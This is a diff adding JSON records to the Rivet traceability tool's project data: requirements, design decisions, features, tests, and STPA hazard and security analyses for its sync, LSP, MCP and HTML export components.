+    },
+    {
+      "description": "HTML export generates a config.js stub that callers can replace at deployment time with version list and homepage URL. The export page shell loads config.js dynamically so that version switching works without regenerating the export.\n",
+      "id": "DD-038",
+      "links": [
+        {
+          "target": "REQ-036",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "export",
+        "navigation",
+        "architecture"
+      ],
+      "title": "Runtime config.js for version switcher and navigation base in HTML export",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nLifecycle status strings from external tools (e.g.,\n\"In Review\",\n\n\"Baselined\",\n\"Obsolete\") are mapped to the wrong Rivet status,\n\ncausing artifacts to appear validated when they are still draft.\n",
+      "id": "H-4.1",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet maps external status values to incorrect internal statuses",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "The generic YAML adapter uses a canonical format where each artifact has explicit type, links array, and fields map. This serves as the universal interchange format that all adapters can target and any downstream tool can consume without domain-specific knowledge.\n",
+      "id": "DD-032",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "architecture"
+      ],
+      "title": "Canonical generic YAML format with explicit type and links array",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-VAR-004",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-VAR-004",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-VAR-004",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "S-expression evaluator must have property-based tests for logical equivalences",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-L-7",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-7",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-17",
+          "type": "prevents"
+        },
+        {
+          "target": "H-14",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nCore salsa database does not invalidate link graph queries when\n\nan artifact file is modified on disk.\n",
+      "id": "UCA-C-10",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Every field value, description, and document body fragment from artifact YAML that is included in HTML output must be escaped using a vetted escaping function before insertion.  The escaping must cover at minimum: < > & \" ' characters.  Markdown-to-HTML conversion must also strip or sandbox dangerous tags (script, iframe, object, embed).\n",
+      "id": "SSC-4",
+      "links": [
+        {
+          "target": "SH-4",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet must HTML-escape all user-controlled artifact content before rendering",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "At analysis time, parsed commit data is injected as ephemeral nodes into the petgraph link graph, wired to referenced artifacts via the configured link types. Enables coverage computation, reachability queries, and dashboard visualization without materializing commit YAML files.\n",
+      "id": "FEAT-032",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-012",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "git",
+        "traceability",
+        "phase-3"
+      ],
+      "title": "Ephemeral commit node injection into link graph",
+      "type": "feature"
+    },
+    {
+      "description": "Embeds spar WASM module and JavaScript glue code into the rivet binary via include_bytes! and include_str! macros, enabling single-binary distribution without external asset files.\n",
+      "id": "FEAT-037",
+      "links": [
+        {
+          "target": "REQ-022",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "packaging",
+        "wasm"
+      ],
+      "title": "Embedded WASM/JS assets for single binary",
+      "type": "feature"
+    },
+    {
+      "description": "\nA bug in the s-expression evaluator (predicate evaluation,\nquantifier\n\nscoping,\nor Datalog compilation) causes a filter or traceability rule\n\nto return wrong results. This affects all downstream consumers:\nCLI\n\n--filter shows wrong artifacts,\ntraceability rules pass when they\n\nshould fail,\nconstraint solver accepts invalid configurations. The\n\ns-expression evaluator is the single point of failure for all query\n\nand validation logic.\n",
+      "id": "H-VAR-004",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "S-expression query produces incorrect results due to evaluator bug",
+      "type": "hazard"
+    },
+    {
+      "description": "Tests for commit-to-artifact traceability covering FEAT-029 through FEAT-032. Verifies git trailer extraction, conventional commit type exemption, Trace-skip opt-out handling, orphan commit detection across traced paths, ephemeral commit node injection into the link graph, and commit coverage report generation.\n",
+      "id": "TEST-017",
+      "links": [
+        {
+          "target": "REQ-017",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-018",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "git",
+        "traceability",
+        "swe-5"
+      ],
+      "title": "Commit traceability trailer parsing and coverage tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe LSP fails to report a validation error,\nand the user commits\n\nartifacts that violate schema rules. In safety-critical contexts\n\n(ASPICE,\nEU AI Act),\nthis means non-compliant deliverables.\n",
+      "id": "L-LSP-001",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "User deploys artifacts with undetected compliance violations",
+      "type": "loss"
+    },
+    {
+      "description": "\nCommand-line interface that parses user commands,\norchestrates\n\ncore operations,\nmanages adapter selection,\nand formats output.\n\nActs as the primary control boundary between the human operator\n\nand Rivet's internal processing.\n",
+      "id": "CTRL-CLI",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet CLI",
+      "type": "controller"
+    },
+    {
+      "description": "\nParser extracts incorrect module name or version from a\n\nbazel_dep() call due to malformed CST construction.\n",
+      "id": "UCA-C-17",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Use a domain-specific YAML adapter for STPA artifacts rather than the generic format. Each STPA concept (losses, hazards, system-constraints, UCAs, controller-constraints, loss-scenarios) gets its own YAML file with structure matching the STPA Handbook methodology.\n",
+      "id": "DD-031",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "stpa",
+        "architecture"
+      ],
+      "title": "STPA-specific YAML adapter with domain-typed files",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe LSP reports an error that doesn't actually exist. The user\n\n(or AI agent) spends effort fixing a non-issue,\nor worse,\nintroduces\n\na real bug while \"fixing\" the false positive.\n",
+      "id": "L-LSP-002",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "User wastes time fixing false positive diagnostics",
+      "type": "loss"
+    },
+    {
+      "description": "\nDashboard displays cached metrics from a previous session\n\nthat no longer reflect the current artifact state.\n",
+      "id": "UCA-D-2",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-DASH",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-2",
+      "links": [
+        {
+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "12 artifact types for AI element safety in road vehicles. Bridges to STPA-AI for ML controller traceability.\n",
+      "id": "FEAT-100",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "ISO/PAS 8800 AI safety lifecycle schema",
+      "type": "feature"
+    },
+    {
+      "description": "\nA developer accidentally runs a bulk find-and-replace on local\n\nYAML files that corrupts status fields (e.g.,\n\"approved\"\nbecomes\n\n\"approv\").  The developer does not validate before pushing.  The\n\nOSLC client's outbound sync pushes these corrupted artifacts to\n\nthe external tool [UCA-O-7].  A second team's Rivet instance,\n\nalso connected to the same external tool,\nsyncs the corrupted\n\ndata inbound.  The corruption has now propagated from one\n\ndeveloper's local store to two external systems [H-8].\n",
+      "id": "LS-O-6",
+      "links": [
+        {
+          "target": "UCA-O-7",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-8",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Error amplification through bidirectional sync chain",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Bidirectional sync with Polarion, DOORS, and codebeamer via OSLC (Open Services for Lifecycle Collaboration) rather than per-tool REST adapters. Support RM, QM, CM domains.\n",
+      "id": "REQ-006",
+      "links": [
+        {
+          "target": "SC-5",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-8",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-5",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-8",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-3",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-4",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-5",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-6",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-7",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-8",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-9",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-O-10",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "oslc",
+        "sync",
+        "interchange"
+      ],
+      "title": "OSLC-based tool synchronization",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA safety engineer modifies a requirement locally while the same\n\nrequirement is updated in Polarion by a systems engineer.  The\n\nOSLC client fetches the Polarion version and writes it to the\n\nlocal YAML file,\noverwriting the safety engineer's changes\n\n[UCA-O-4].  The safety engineer's safety-related amendments to\n\nthe requirement (e.g.,\nadding a safety integrity level or hazard\n\nreference) are lost [H-5].  The git commit shows the overwrite,\n\nbut the safety engineer does not notice until the next review,\n\nby which time a compliance report may have been generated from\n\nthe incomplete data [H-6].\n",
+      "id": "LS-O-2",
+      "links": [
+        {
+          "target": "UCA-O-4",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-7",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Last-writer-wins during concurrent modification",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nThe salsa incremental path and the direct validation path must\n\nproduce the same set of diagnostics for the same input. Any\n\ndivergence is a cache correctness bug.\n",
+      "id": "SC-LSP-008",
+      "links": [
+        {
+          "target": "H-LSP-001",
+          "type": "prevents"
+        },
+        {
+          "target": "H-LSP-002",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Incremental validation MUST produce identical results to full validation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nCore does not rebuild the link graph after an OSLC sync\n\nintroduces new or modified artifacts.\n",
+      "id": "UCA-C-2",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Computes artifact differences between two snapshots (added, removed, modified artifacts with field-level change details).\n",
+      "id": "ARCH-CORE-DIFF",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "diff"
+      ],
+      "title": "Diff Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "\nEvery validation run must verify that all artifact IDs in bindings\n\nexist in the current artifact store and all source globs match at\n\nleast one file. Stale bindings must produce error-level diagnostics,\n\nnot warnings,\nbecause they directly affect variant scoping correctness.\n",
+      "id": "SC-VAR-003",
+      "links": [
+        {
+          "target": "H-VAR-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Binding validation must detect stale references on every validation run",
+      "type": "system-constraint"
+    },
+    {
+      "description": "The ReqIF adapter preserves XHTML rich-text content during import and export rather than flattening to plain text. This maintains round-trip fidelity with Polarion, DOORS, and other tools that embed XHTML in SpecObject attribute values.\n",
+      "id": "DD-034",
+      "links": [
+        {
+          "target": "REQ-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "reqif",
+        "architecture"
+      ],
+      "title": "ReqIF XML round-trip with XHTML content preservation",
+      "type": "design-decision"
+    },
+    {
+      "description": "Document embeds support modifiers (full, links, upstream, downstream, chain, table) with schema-driven link traversal.\n",
+      "id": "REQ-033",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "documents",
+        "embedding",
+        "traceability"
+      ],
+      "title": "Rich artifact embedding in documents with schema-driven link traversal",
+      "type": "requirement"
+    },
+    {
+      "description": "Parses test execution results (JUnit XML) and coverage data (LCOV) for evidence tracking and dashboard display.\n",
+      "id": "ARCH-CORE-RESULTS",
+      "links": [
+        {
+          "target": "REQ-009",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "results"
+      ],
+      "title": "Results Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Test execution results (JUnit XML, coverage LCOV) are packaged and uploaded as GitHub release assets. The CI release-results job creates a tar.gz with test-results, coverage, and metadata JSON.\n",
+      "id": "DD-007",
+      "links": [
+        {
+          "target": "REQ-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "ci",
+        "evidence"
+      ],
+      "title": "Test results tied to GitHub releases",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nCLI selects the wrong adapter for the current data source.\n",
+      "id": "UCA-L-4",
+      "links": [
+        {
+          "target": "H-4",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe diagnostic message suggests a fix that doesn't resolve the\n\nissue or introduces a new problem. Particularly dangerous for\n\nAI agents that follow fix suggestions literally.\n",
+      "id": "H-LSP-004",
+      "links": [
+        {
+          "target": "L-LSP-003",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP provides misleading fix suggestion",
+      "type": "hazard"
+    },
+    {
+      "description": "The system must import artifacts from the sphinx-needs needs.json export format, mapping sphinx-needs types, links, and fields to rivet schema types via configurable mappings. This provides a migration path for projects using sphinx-needs-based toolchains.\n",
+      "id": "REQ-025",
+      "links": [
+        {
+          "target": "SC-4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "interchange",
+        "adapter",
+        "migration"
+      ],
+      "title": "sphinx-needs JSON import",
+      "type": "requirement"
+    },
+    {
+      "description": "JavaScript (HTMX, Mermaid) and WASM (spar) assets are embedded in the binary via include_str!/include_bytes!. build.rs generates stub files when spar WASM is not built, ensuring compilation always succeeds. The runtime detects stubs and shows a fallback message.\n",
+      "id": "DD-039",
+      "links": [
+        {
+          "target": "REQ-022",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "assets",
+        "wasm"
+      ],
+      "title": "Embed assets via include_str!/include_bytes! with build.rs stub generation",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-6",
+      "links": [
+        {
+          "target": "CTRL-REQIF",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-Q-6",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nfind_latest_snapshot() picks a snapshot from the current\n\nrelease (just captured) instead of the previous release,\n\nor picks a corrupted/partial snapshot file.\n",
+      "id": "H-IMPL-002",
+      "links": [
+        {
+          "target": "L-IMPL-001",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Delta auto-detection picks wrong baseline",
+      "type": "hazard"
+    },
+    {
+      "description": "Computes traceability matrix with coverage percentages. Source type → target type mapping with linked/total counts.\n",
+      "id": "ARCH-CORE-MATRIX",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "matrix"
+      ],
+      "title": "Matrix Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "Schema semantics modeled in Rocq via coq-of-rust translation of Schema, TraceabilityRule, and ConditionalRule types. Theorems proven for schema satisfiability (rules not contradictory), monotonicity (adding artifacts preserves validity), link graph well-foundedness (validation terminates), and ASPICE V-model completeness (schema enforces full traceability chain). Serves as formal specification for ISO 26262 TCL 1 tool qualification evidence.\n",
+      "id": "FEAT-051",
+      "links": [
+        {
+          "target": "REQ-030",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-027",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "metamodel",
+        "future"
+      ],
+      "title": "Rocq metamodel specification and satisfiability proofs",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe WASM runtime (wasm_runtime.rs) loads and executes third-party\n\nadapter components. A compromised or buggy WASM adapter could\n\nreturn fabricated artifacts,\nmodify link targets,\ninject additional\n\nartifacts,\nor silently drop artifacts during import. The host trusts\n\nthe adapter's output without independent verification against the\n\nsource data. In a worst-case environment where adapters are\n\ndistributed as binary components without source review,\na supply\n\nchain attack could introduce falsified traceability data.\n",
+      "id": "H-14",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet WASM adapter executes untrusted code that corrupts import results",
+      "type": "hazard"
+    },
+    {
+      "description": "Validates that link types used by artifacts exist in the schema and that artifact fields are defined in the schema for their type.\n",
+      "id": "FEAT-085",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Unknown link type and unknown field validation",
+      "type": "feature"
+    },
+    {
+      "description": "\nErrors or corruptions detected during inbound sync must be\n\nquarantined.  Rivet must not propagate unvalidated inbound data\n\nto outbound sync channels or to local authoritative stores\n\nwithout explicit user approval.\n",
+      "id": "SC-8",
+      "links": [
+        {
+          "target": "H-8",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must isolate sync errors and prevent cross-tool error propagation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Import/export adapter for OMG ReqIF 1.2 XML format.\n",
+      "id": "FEAT-010",
+      "links": [
+        {
+          "target": "REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-034",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "interchange",
+        "phase-2"
+      ],
+      "title": "ReqIF 1.2 adapter",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe feature model's cross-tree constraints are satisfiable (the solver\n\nsays the model is valid),\nbut they fail to encode actual domain\n\nconstraints. For example,\na real regulatory constraint that \"autonomous\n\ndriving requires ASIL D\" is missing from the feature model,\nso\n\na variant selecting autonomous + ASIL B is accepted. The tool cannot\n\ndetect what domain experts forgot to encode — it can only validate\n\nwhat's written.\n",
+      "id": "H-VAR-002",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Feature model constraints are satisfiable but do not capture real-world exclusions",
+      "type": "hazard"
+    },
+    {
+      "description": "\nMCP server returns partial artifact list when loading fails\n\nfor one source directory,\nwithout indicating the failure.\n",
+      "id": "UCA-M-2",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Load schema files from YAML, merge multiple schemas, and provide lookup for artifact types, link types, and inverse mappings.\n",
+      "id": "FEAT-003",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "schema",
+        "phase-1"
+      ],
+      "title": "Schema loading and merging",
+      "type": "feature"
+    },
+    {
+      "description": "Dashboard section providing a schema browser, link type reference, validation rules summary, and doc topic viewer. Gives users a graphical interface for exploring schemas and documentation alongside their artifacts.\n",
+      "id": "FEAT-028",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ui",
+        "dashboard",
+        "docs",
+        "phase-2"
+      ],
+      "title": "Help and Docs dashboard section",
+      "type": "feature"
+    },
+    {
+      "description": "Generates .rivet/agent-context.md containing project state, coverage summaries, active validation rules, and example artifact IDs. Designed to give AI coding agents the context they need to work effectively with rivet-managed projects.\n",
+      "id": "FEAT-024",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "agent",
+        "phase-2"
+      ],
+      "title": "rivet context command",
+      "type": "feature"
+    },
+    {
+      "description": "Lower SysML v2 system models to AADL execution platform models where timing, scheduling, and resource binding semantics exist. Implements the mapping rules specified by SEI's \"Extending SysML v2 with AADL Concepts\" research. Enables multi-level architecture analysis: SysML v2 (system-level) to AADL (deployment-level) to implementation.\n",
+      "id": "REQ-038",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "sysml",
+        "aadl",
+        "architecture",
+        "future"
+      ],
+      "title": "SysML v2 to AADL model lowering",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-C-14",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-14",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "prevents"
+        },
+        {
+          "target": "H-10",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Integration tests for {{artifact:ID}} embed resolution in documents, ArtifactInfo forward/backlink enrichment, and schema-driven link traversal in document rendering. Verifies that embedded artifact blocks include resolved link titles and field values.\n",
+      "id": "TEST-014",
+      "links": [
+        {
+          "target": "REQ-033",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "documents",
+        "embedding",
+        "swe-5"
+      ],
+      "title": "Rich artifact embedding and document schema-driven link traversal tests",
+      "type": "feature"
+    },
+    {
+      "description": "15 artifact types covering the full IEC 61508 V-model with SIL-based traceability and independent assessment rules.\n",
+      "id": "FEAT-098",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "IEC 61508 functional safety schema",
+      "type": "feature"
+    },
+    {
+      "description": "Added source_file, line, column to Diagnostic rather than creating a separate LspDiagnostic type.\n",
+      "id": "DD-046",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Diagnostic struct extended with location fields",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe VS Code extension's WebView panel must be created with\n\nsandbox restrictions that prevent arbitrary script execution\n\nfrom non-trusted origins.  The WebView must only accept\n\npostMessage commands from the extension host and must not\n\nrelay artifact data to untrusted iframe origins.\n",
+      "id": "SC-22",
+      "links": [
+        {
+          "target": "H-20",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "VS Code WebView must use sandbox restrictions for dashboard content",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nThe MCP server loads project state once at startup and doesn't\n\nreload when files change. Agent sees old validation results\n\nafter making changes.\n",
+      "id": "H-IMPL-003",
+      "links": [
+        {
+          "target": "L-IMPL-002",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "MCP server loads stale project state",
+      "type": "hazard"
+    },
+    {
+      "description": "The MCP stdio transport has no authentication mechanism. Any process that can connect to stdin/stdout can invoke rivet tools. On shared systems, this could be exploited.\n",
+      "id": "SH-IMPL-002",
+      "links": [
+        {
+          "target": "SL-IMPL-002",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "draft",
+      "tags": [],
+      "title": "MCP server has no authentication",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "\nLSP does not provide updated diagnostics after file save when\n\nsalsa cache is stale.\n",
+      "id": "UCA-C-26",
+      "links": [
+        {
+          "target": "H-19",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "The rivet binary must optionally embed all WASM and JavaScript assets so it can be distributed as a single self-contained executable.\n",
+      "id": "REQ-022",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "packaging",
+        "wasm"
+      ],
+      "title": "Single-binary WASM asset embedding",
+      "type": "requirement"
+    },
+    {
+      "description": "14 artifact types covering PSAC through SAS with DAL-based traceability rules for aviation software certification.\n",
+      "id": "FEAT-096",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "DO-178C airborne software schema",
+      "type": "feature"
+    },
+    {
+      "description": "7 ML lifecycle artifact types extending STPA for AI/ML systems. 5 traceability rules. Based on DeepSTPA, UniSTPA, ISO/PAS 8800.\n",
+      "id": "FEAT-090",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "STPA-for-AI extension schema",
+      "type": "feature"
+    },
+    {
+      "description": "The system must parse git commit trailers and link them to artifacts at runtime, injecting ephemeral commit nodes into the link graph. Must support configurable trailer-to-link-type mapping and produce five report types: linked commits, broken references, orphan commits, artifact commit coverage, and unimplemented artifacts.\n",
+      "id": "REQ-017",
+      "links": [
+        {
+          "target": "SC-7",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-17",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-7",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-17",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-18",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-19",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "traceability",
+        "git"
+      ],
+      "title": "Commit-to-artifact traceability",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA schema file is modified (e.g.,\nadding a conditional rule) but\n\nthe salsa input query for schemas is not invalidated. Validation\n\ncontinues using the old schema,\nmissing the new rule.\n",
+      "id": "H-9.1",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet salsa database does not track schema file changes as inputs",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-Q-3",
+      "links": [
+        {
